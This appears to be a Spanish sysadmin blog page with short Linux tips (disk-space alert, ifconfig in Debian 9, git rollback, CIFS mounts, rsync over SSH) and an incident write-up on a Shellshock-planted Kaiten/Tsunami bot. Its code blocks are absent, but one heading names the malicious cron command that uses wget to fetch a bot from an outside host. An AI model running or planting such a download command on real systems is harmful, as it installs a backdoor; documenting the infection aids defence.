Enviar Alerta Email cuando el Disco este Lleno

Si no tienes tiempo o necesidad de instalar una solución de monitorización como Nagios para tener cuidado del espacio libre de tus servidores, siempre puedes poner en el cron una alerta que te avise cuando quede poco espacio en disco.

Para ello crea un archivo .sh con este contenido, donde la variable THRESHOLD=90 es el porcentaje de disco ocupado a partir del cual quieres enviar el e-mail de alerta:

Ya solo falta que lo pongas en un cron que se ejecute horariamente, para estar al corriente del espacio de tus servidores.

 

 

¿Donde está ifconfig en Debian 9 Stretch?

ifconfig ya no está instalado por defecto a partir de Debian 9

Sí amigos, si no os habíais enterado aún, Debian 9 ha sustituido ifconfig, o su paquete net-tools por iproute2, la nueva herramienta para gestionar las redes Linux.

Así que tenemos dos opciones:

– Instalar net-tools y recuperar nuestro amado ifconfig:

– O actualizarnos y aprender a usar el nuevo comando:

Pienso que si han decidido hacer este cambio por algo será, así que por mi parte prefiero adaptarme y usar “ip addr show” cada vez que quiera saber la ip del equipo.

Otro comando útil para ver otros datos de la interfaz de red sería el siguiente:

 

GIT: Paso atrás en el último git pull de nuestro control de versiones

¿Has hecho git pull en tu servidor y lo has roto todo? ¡No te preocupes! Con GIT puedes volver atrás con un solo comando:

Con esto iremos un paso atrás en nuestro control de versiones y recuperaremos la versión anterior del programa.

El número 1 del comando es el número de pasos atrás que queremos dar, por lo que os recomiendo usar el siguiente comando para ver en que versión nos encontramos:

 

LINUX: Montar unidad cifs con dominio permanente

Para montar una unidad compartida por un pc en un dominio Windows necesitamos especificar el usuario, contraseña y dominio en el comando para montar la unidad, tal como está en este ejemplo:

Ahora bien, si queremos que el montaje sea permanente, que al arrancar se monte automáticamente, necesitamos añadir los siguiente en el fichero /etc/fstab

Y para comprobar que la configuración está correcta y montar la unidad podemos ejecutar el comando

 

LINUX: wget stablehost.us/bots/regular.bot etc en nuestro cron es un troyano

Aviso: Esto no es una solución, son datos que te pueden ayudar a solucionarlo.

Hoy, me he encontrado con que en el cron de mi CentOs me faltaban tareas, y que además había una muy sospechosa:

Investigando en las siguientes webs encontré que se trataba de un troyano/malware que ha aprovechado la reciente vulnerabilidad shellshock llamado Linux.Backdoor.Kaiten o Tsunami Bot

Enlaces/fuentes que me han ayudado:

http://infosecnirvana.com/shellshock-hello-honeypot/ (Datos sobre el malware)

http://rm-rf.in/post/98621485262/shellshock-test-the-vulnerability (Para arreglar la vulnerabilidad)

http://security.stackexchange.com/questions/16908/is-secureshellz-bot-a-virus-how-does-it-work

 

En mi servidor CentOs pude recoger algunos datos:

  1. Linea de cron especificada anteriormente
  2. Archivo /tmp/.pwn
  3. Proceso .c en el top
  4. Log en apache

Lo más interesante es el archivo /tmp/.pwn cuyo contenido es el siguiente:

Aquí vemos como se conecta a una serie de servidores de los que descarga el malware en cuestión del que pondré un fragmento abajo de este post. A continuación lo compila con gcc y asigna permisos a directorios en /tmp, lo extraño es que después elimina los archivos descargados.

Después en el log de apache /etc/httpd/logs/access_log encontré como se ejecuto el comando inicial así como la IP atacante:

Ahora bien, ¿qué es lo que he hecho?

He actualizado el bash para que no vuelva a pasar

He eliminado:

– La tarea de cron

– El archivo /tmp/.pwd

Y por último he decidido actualizar los servidores.

Este post no está completo, si consigo más información lo terminaré.

Os dejo el fragmento de código del malware donde se ve que entre otras cosas abre un canal IRC:

Está recortado, en total tiene unas 985 líneas.

SSH y RSYNC: Descargar directorios de Linux a Linux por terminal

-avz Opciones: archivo, verbose, compresión
-e “ssh -p 213” Usar SSH y puerto determinado
–progress Mostrar progreso
cristianmartin@111.111.11.11 Usuario e IP o dominio del linux externo